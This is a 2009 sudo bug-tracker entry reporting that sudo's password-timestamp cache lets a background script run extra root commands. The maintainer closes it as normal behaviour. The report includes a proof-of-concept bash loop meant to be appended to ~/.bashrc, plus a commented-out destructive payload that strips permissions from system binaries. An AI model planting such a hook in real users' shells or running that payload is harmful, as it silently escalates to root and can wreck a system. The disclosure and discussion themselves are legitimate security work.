Bug 377

Summary: Timestamp exploit by programmatically launching another sudo command shortly after.
Product: Sudo Reporter: Johannes Buchner <buchner.johannes>
Component: SudoAssignee: Todd C. Miller <Todd.Miller>
Status: RESOLVED INVALID    
Severity: security    
Priority: low    
Version: 1.7.2   
Hardware: PC   
OS: Linux   

Description Johannes Buchner 2009-12-01 06:07:01 MST 
The timestamp capability of sudo, as shipped with Ubuntu by default, can be exploited to execute another command after the user start his/her own command. 

Consider appending the following script to ~/.bashrc: It waits for the user to launch a sudo-enhanced program. (This obviously also works if NOPASSWD is set for the user.)
# this exploits sudo's timout capability by launching another command when
# the user did some sudo command shortly before.

MAXAGE=100

while sleep 10
do 
	pgrep -f -U 0 -P $PPID,$$ && {
		echo parent has a root owned child process
		id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1)
		# wait $id
		age=$(($(date +%s) - $(stat /proc/$id/ -c '%Y')))
		if [ "$age" -lt "$MAXAGE" ]; then
			echo the child is young
			# launch next stage payload
			# sudo chown -x /bin/* /sbin/*
			sudo id
		fi
	}
done &
# 
Note that any program can reach root by waiting for the user to launch any sudo command.

Ideally, sudo (or PolicyKit) should be able to tell whether the command came from the keyboard, or a program. This, however is not possible.
A workaround is to disable timestamps.

This might be related to http://www.sudo.ws/bugs/show_bug.cgi?id=357

What measures can be taken to mitigate this? Would you consider this a security bug, or the normal behaviour of sudo? What should distros/users do about it?
Comment 1 Todd C. Miller 2009-12-08 10:27:53 MST 
This is normal sudo behavior.  Sites that wish to disable the timestamps may do so.  The point of the timestamp file is to provide a middle ground between the convenience of using a root shell and the security of requiring a password for each root command.

If someone is able to write to your .bashrc your account is effectively compromised as it is possible to invoke a keylogger to read the password used for sudo (or anything else).  As such, I don't think this is a sudo-specific problem.